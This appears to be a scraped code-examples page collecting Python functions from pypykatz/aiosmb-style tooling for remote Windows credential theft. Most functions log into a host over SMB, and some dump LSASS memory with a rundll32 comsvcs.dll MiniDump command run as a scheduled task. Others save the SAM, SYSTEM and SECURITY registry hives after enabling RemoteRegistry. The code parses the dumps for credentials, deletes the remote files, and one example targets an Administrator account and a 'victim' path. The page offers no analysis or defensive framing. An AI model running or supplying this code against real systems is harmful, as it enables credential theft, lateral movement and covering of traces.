Ejemplo n.º 1
0
async def lsassfile(url, packages=['all'], chunksize=64 * 1024):
    from aiosmb.commons.connection.url import SMBConnectionURL
    from pypykatz.alsadecryptor.asbmfile import SMBFileReader
    from pypykatz.apypykatz import apypykatz

    smburl = SMBConnectionURL(url)
    connection = smburl.get_connection()
    smbfile = smburl.get_file()

    async with connection:
        logging.debug('[LSASSFILE] Connecting to server...')
        _, err = await connection.login()
        if err is not None:
            raise err

        logging.debug('[LSASSFILE] Connected!')
        logging.debug('[LSASSFILE] Opening LSASS dump file...')
        _, err = await smbfile.open(connection)
        if err is not None:
            raise err

        logging.debug('[LSASSFILE] LSASS file opened!')
        logging.debug('[LSASSFILE] parsing LSASS file...')
        mimi = await apypykatz.parse_minidump_external(SMBFileReader(smbfile),
                                                       chunksize=chunksize,
                                                       packages=packages)
        logging.debug('[LSASSFILE] LSASS file parsed OK!')
        return mimi
Ejemplo n.º 2
0
    async def run(self, args):

        if args.smb_module == 'lsassfile':
            from aiosmb.commons.connection.url import SMBConnectionURL
            from pypykatz.alsadecryptor.asbmfile import SMBFileReader
            from pypykatz.apypykatz import apypykatz

            smburl = SMBConnectionURL(args.url)
            connection = smburl.get_connection()
            smbfile = smburl.get_file()

            async with connection:
                _, err = await connection.login()
                if err is not None:
                    raise err

                _, err = await smbfile.open(connection)
                if err is not None:
                    raise err

                mimi = await apypykatz.parse_minidump_external(
                    SMBFileReader(smbfile))
                self.process_results({'smbfile': mimi}, [], args)

        elif args.smb_module == 'console':
            from aiosmb.examples.smbclient import amain
            la = SMBCMDArgs()
            la.smb_url = args.url
            la.verbose = args.verbose
            if args.commands is not None and len(args.commands) > 0:
                la.commands = []
                if args.commands[0] == 'help':
                    la.commands = ['help']
                else:
                    if args.commands[0] != 'login':
                        la.commands.append('login')

                    for command in args.commands:
                        la.commands.append(command)

            await amain(la)
Ejemplo n.º 3
0
async def amain():
	from aiosmb.commons.connection.url import SMBConnectionURL
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader

	import sys
	f=sys.argv[1]
	print(f)

	url = 'smb2+ntlm-password://TEST\\Administrator:[email protected]/C$/Users/victim/Desktop/lsass.DMP'
	smburl = SMBConnectionURL(url)
	connection = smburl.get_connection()
	smbfile = smburl.get_file()

	async with connection:
		_, err = await connection.login()
		if err is not None:
			raise err
		
		_, err = await smbfile.open(connection)
		if err is not None:
			raise err

		mimi = await apypykatz.parse_minidump_external(SMBFileReader(smbfile))
		print(mimi)
Ejemplo n.º 4
0
async def regdump(url,
                  hives=['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'],
                  remote_base_path='C:\\Windows\\Temp\\',
                  remote_share_name='\\c$\\Windows\\Temp\\',
                  enable_wait=3):
    from aiosmb.commons.connection.url import SMBConnectionURL
    from aiosmb.commons.interfaces.machine import SMBMachine
    from aiosmb.commons.interfaces.file import SMBFile
    from aiosmb.dcerpc.v5.common.service import SMBServiceStatus
    from pypykatz.alsadecryptor.asbmfile import SMBFileReader
    from pypykatz.registry.aoffline_parser import OffineRegistry

    smburl = SMBConnectionURL(url)
    connection = smburl.get_connection()
    if remote_base_path.endswith('\\') is False:
        remote_base_path += '\\'

    if remote_share_name.endswith('\\') is False:
        remote_share_name += '\\'

    po = None

    async with connection:
        logging.debug('[REGDUMP] Connecting to server...')
        _, err = await connection.login()
        if err is not None:
            raise err

        logging.debug('[REGDUMP] Connected to server!')
        async with SMBMachine(connection) as machine:
            logging.debug(
                '[REGDUMP] Checking remote registry service status...')
            status, err = await machine.check_service_status('RemoteRegistry')
            if err is not None:
                raise err

            logging.debug('[REGDUMP] Remote registry service status: %s' %
                          status.name)
            if status != SMBServiceStatus.RUNNING:
                logging.debug('[REGDUMP] Enabling Remote registry service')
                _, err = await machine.enable_service('RemoteRegistry')
                if err is not None:
                    raise err
                logging.debug('[REGDUMP] Starting Remote registry service')
                _, err = await machine.start_service('RemoteRegistry')
                if err is not None:
                    raise err

                await asyncio.sleep(enable_wait)

            logging.debug(
                '[REGDUMP] Remote registry service should be running now...')
            files = {}
            for hive in hives:
                fname = '%s.%s' % (os.urandom(4).hex(), os.urandom(3).hex())
                remote_path = remote_base_path + fname
                remote_sharepath = remote_share_name + fname
                remote_file = SMBFileReader(
                    SMBFile.from_remotepath(connection, remote_sharepath))
                files[hive.split('\\')[1].upper()] = remote_file

                logging.info('[REGDUMP] Dumping reghive %s to (remote) %s' %
                             (hive, remote_path))
                _, err = await machine.save_registry_hive(hive, remote_path)
                if err is not None:
                    raise err

            #await asyncio.sleep(1)
            for rfilename in files:
                rfile = files[rfilename]
                logging.debug('[REGDUMP] Opening reghive file %s' % rfilename)
                _, err = await rfile.open(connection)
                if err is not None:
                    raise err

            try:
                logging.debug('[REGDUMP] Parsing hives...')
                po = await OffineRegistry.from_async_reader(
                    files['SYSTEM'],
                    sam_reader=files.get('SAM'),
                    security_reader=files.get('SECURITY'),
                    software_reader=files.get('SOFTWARE'))
            except Exception as e:
                print(e)

            logging.debug('[REGDUMP] Hives parsed OK!')

            logging.debug('[REGDUMP] Deleting remote files...')
            err = None
            for rfilename in files:
                rfile = files[rfilename]
                err = await rfile.close()
                if err is not None:
                    logging.debug(
                        '[REGDUMP] ERR! Failed to close hive dump file! %s' %
                        rfilename)

                _, err = await rfile.delete()
                if err is not None:
                    logging.debug(
                        '[REGDUMP] ERR! Failed to delete hive dump file! %s' %
                        rfilename)

            if err is None:
                logging.debug('[REGDUMP] Deleting remote files OK!')
    return po
Ejemplo n.º 5
0
async def regfile(url,
                  system,
                  sam=None,
                  security=None,
                  software=None,
                  smb_basepath=None):
    from aiosmb.commons.connection.url import SMBConnectionURL
    from aiosmb.commons.interfaces.file import SMBFile
    from pypykatz.alsadecryptor.asbmfile import SMBFileReader
    from pypykatz.registry.aoffline_parser import OffineRegistry

    smburl = SMBConnectionURL(url)
    connection = smburl.get_connection()

    if smb_basepath is None:
        smb_basepath = smburl.path
    if smb_basepath.endswith('/') is False:
        smb_basepath += '/'
    smb_basepath = smb_basepath.replace('/', '\\')

    system_smbfile_path = smb_basepath + system
    sam_smbfile = None
    security_smbfile = None
    software_smbfile = None

    system_smbfile = SMBFileReader(
        SMBFile.from_remotepath(connection, system_smbfile_path))

    if sam:
        sam_smbfile_path = smb_basepath + sam
        sam_smbfile = SMBFileReader(
            SMBFile.from_remotepath(connection, sam_smbfile_path))

    if security:
        security_smbfile_path = smb_basepath + security
        security_smbfile = SMBFileReader(
            SMBFile.from_remotepath(connection, security_smbfile_path))

    if software:
        software_smbfile_path = smb_basepath + software
        software_smbfile = SMBFileReader(
            SMBFile.from_remotepath(connection, software_smbfile_path))

    po = None
    async with connection:
        logging.debug('[REGFILE] Connecting to server...')
        _, err = await connection.login()
        if err is not None:
            raise err

        logging.debug('[REGFILE] Connected to server!')
        logging.debug('[REGFILE] Opening SYSTEM hive dump file...')
        # parse files here
        _, err = await system_smbfile.open(connection)
        if err is not None:
            raise err

        if sam_smbfile is not None:
            logging.debug('[REGFILE] Opening SAM hive dump file...')
            _, err = await sam_smbfile.open(connection)
            if err is not None:
                raise err

        if security_smbfile is not None:
            logging.debug('[REGFILE] Opening SECURITY hive dump file...')
            _, err = await security_smbfile.open(connection)
            if err is not None:
                raise err

        if software_smbfile is not None:
            logging.debug('[REGFILE] Opening SOFTWARE hive dump file...')
            _, err = await software_smbfile.open(connection)
            if err is not None:
                raise err

        logging.debug('[REGFILE] All files opened OK!')
        logging.debug('[REGFILE] Parsing hive files...')
        po = await OffineRegistry.from_async_reader(
            system_smbfile,
            sam_reader=sam_smbfile,
            security_reader=security_smbfile,
            software_reader=software_smbfile)
        logging.debug('[REGFILE] Hive files parsed OK!')

    return po
Ejemplo n.º 6
0
async def lsassdump(url,
                    method='taskexec',
                    remote_base_path='C:\\Windows\\Temp\\',
                    remote_share_name='\\c$\\Windows\\Temp\\',
                    chunksize=64 * 1024,
                    packages=['all']):
    from aiosmb.commons.exceptions import SMBException
    from aiosmb.wintypes.ntstatus import NTStatus
    from aiosmb.commons.connection.url import SMBConnectionURL
    from aiosmb.commons.interfaces.machine import SMBMachine
    from pypykatz.alsadecryptor.asbmfile import SMBFileReader
    from aiosmb.commons.interfaces.file import SMBFile
    from pypykatz.apypykatz import apypykatz

    smburl = SMBConnectionURL(url)
    connection = smburl.get_connection()

    if remote_base_path.endswith('\\') is False:
        remote_base_path += '\\'

    if remote_share_name.endswith('\\') is False:
        remote_share_name += '\\'

    fname = '%s.%s' % (os.urandom(5).hex(), os.urandom(3).hex())
    filepath = remote_base_path + fname
    filesharepath = remote_share_name + fname

    if method == 'taskexec':
        cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B {} full""".format(
            filepath)
        commands = [cmd]

    else:
        raise Exception('Unknown execution method %s' % method)

    mimi = None
    async with connection:
        logging.debug('[LSASSDUMP] Connecting to server...')
        _, err = await connection.login()
        if err is not None:
            raise err
        logging.debug('[LSASSDUMP] Connected!')
        async with SMBMachine(connection) as machine:
            if method == 'taskexec':
                logging.debug(
                    '[LSASSDUMP] Start dumping LSASS with taskexec method!')
                logging.info('[LSASSDUMP] File location: %s' % filepath)
                _, err = await machine.tasks_execute_commands(commands)
                if err is not None:
                    raise err

                logging.debug(
                    '[LSASSDUMP] Sleeping a bit to let the remote host finish dumping'
                )
                await asyncio.sleep(10)

            else:
                raise Exception('Unknown execution method %s' % method)

        logging.debug('[LSASSDUMP] Opening LSASS dump file...')
        for _ in range(3):
            smbfile = SMBFileReader(
                SMBFile.from_remotepath(connection, filesharepath))
            _, err = await smbfile.open(connection)
            if err is not None:
                if isinstance(err, SMBException):
                    if err.ntstatus == NTStatus.SHARING_VIOLATION:
                        logging.debug(
                            '[LSASSDUMP] LSASS dump is not yet ready, retrying...'
                        )
                        await asyncio.sleep(1)
                        continue
                raise err
            break
        else:
            raise err

        logging.debug('[LSASSDUMP] LSASS dump file opened!')
        logging.debug(
            '[LSASSDUMP] parsing LSASS dump file on the remote host...')
        mimi = await apypykatz.parse_minidump_external(smbfile,
                                                       chunksize=chunksize,
                                                       packages=packages)

        logging.debug('[LSASSDUMP] parsing OK!')
        logging.debug('[LSASSDUMP] Deleting remote dump file...')
        _, err = await smbfile.delete()
        if err is not None:
            logging.info(
                '[LSASSDUMP] Failed to delete LSASS file! Reason: %s' % err)
        else:
            logging.info('[LSASSDUMP] remote LSASS file deleted OK!')

    return mimi
Ejemplo n.º 7
0
async def lsassdump_single(targetid,
                           connection,
                           method='task',
                           remote_base_path='C:\\Windows\\Temp\\',
                           remote_share_name='\\c$\\Windows\\Temp\\',
                           chunksize=64 * 1024,
                           packages=['all']):
    try:
        from aiosmb.commons.exceptions import SMBException
        from aiosmb.wintypes.ntstatus import NTStatus
        from aiosmb.commons.interfaces.machine import SMBMachine
        from pypykatz.alsadecryptor.asbmfile import SMBFileReader
        from aiosmb.commons.interfaces.file import SMBFile
        from pypykatz.apypykatz import apypykatz

        if remote_base_path.endswith('\\') is False:
            remote_base_path += '\\'

        if remote_share_name.endswith('\\') is False:
            remote_share_name += '\\'

        fname = '%s.%s' % (os.urandom(5).hex(), os.urandom(3).hex())
        filepath = remote_base_path + fname
        filesharepath = remote_share_name + fname

        if method == 'task':
            cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B {} full""".format(
                filepath)
            commands = [cmd]

        elif method == 'service':
            cmd = ''

        else:
            raise Exception('Unknown execution method %s' % method)

        mimi = None
        async with connection:
            logger.debug('[LSASSDUMP][%s] Connecting to server...' % targetid)
            _, err = await connection.login()
            if err is not None:
                raise err
            logger.debug('[LSASSDUMP][%s] Connected!' % targetid)
            async with SMBMachine(connection) as machine:
                if method == 'task':
                    logger.debug(
                        '[LSASSDUMP][%s] Start dumping LSASS with taskexec method!'
                        % targetid)
                    smbfile_inner, err = await machine.task_dump_lsass()

                    if err is not None:
                        raise err

                    smbfile = SMBFileReader(smbfile_inner)

                    #logger.debug('[LSASSDUMP][%s] Start dumping LSASS with taskexec method!' % targetid)
                    #logger.info('[LSASSDUMP][%s] File location: %s' % (targetid,filepath))
                    #_, err = await machine.tasks_execute_commands(commands)
                    #if err is not None:
                    #	raise err
                    #
                    #logger.debug('[LSASSDUMP][%s] Opening LSASS dump file...' % targetid)
                    #for _ in range(5):
                    #	logger.debug('[LSASSDUMP][%s] Sleeping a bit to let the remote host finish dumping' % targetid)
                    #	await asyncio.sleep(5)
                    #	smbfile = SMBFileReader(SMBFile.from_remotepath(connection, filesharepath))
                    #	_, err = await smbfile.open(connection)
                    #	if err is not None:
                    #		if isinstance(err, SMBException):
                    #			if err.ntstatus == NTStatus.SHARING_VIOLATION:
                    #				logger.debug('[LSASSDUMP][%s] LSASS dump is not yet ready, retrying...' % targetid)
                    #				#await asyncio.sleep(1)
                    #				continue
                    #		raise err
                    #	break
                    #else:
                    #	raise err

                elif method == 'service':
                    logger.debug(
                        '[LSASSDUMP][%s] Start dumping LSASS with serviceexec method!'
                        % targetid)
                    smbfile_inner, err = await machine.service_dump_lsass()

                    if err is not None:
                        raise err
                    smbfile = SMBFileReader(smbfile_inner)

                else:
                    raise Exception('Unknown execution method %s' % method)

            logger.debug('[LSASSDUMP][%s] LSASS dump file opened!' % targetid)
            logger.debug(
                '[LSASSDUMP][%s] parsing LSASS dump file on the remote host...'
                % targetid)
            mimi = await apypykatz.parse_minidump_external(smbfile,
                                                           chunksize=chunksize,
                                                           packages=packages)

            logger.debug('[LSASSDUMP][%s] parsing OK!' % targetid)
            logger.debug('[LSASSDUMP][%s] Deleting remote dump file...' %
                         targetid)
            _, err = await smbfile.delete()
            if err is not None:
                print('[%s] Failed to delete LSASS file! Reason: %s' %
                      (targetid, err))
            else:
                print('[%s] Remote LSASS file deleted OK!' % targetid)

        return targetid, mimi, None
    except Exception as e:
        import traceback
        traceback.print_exc()
        return targetid, None, e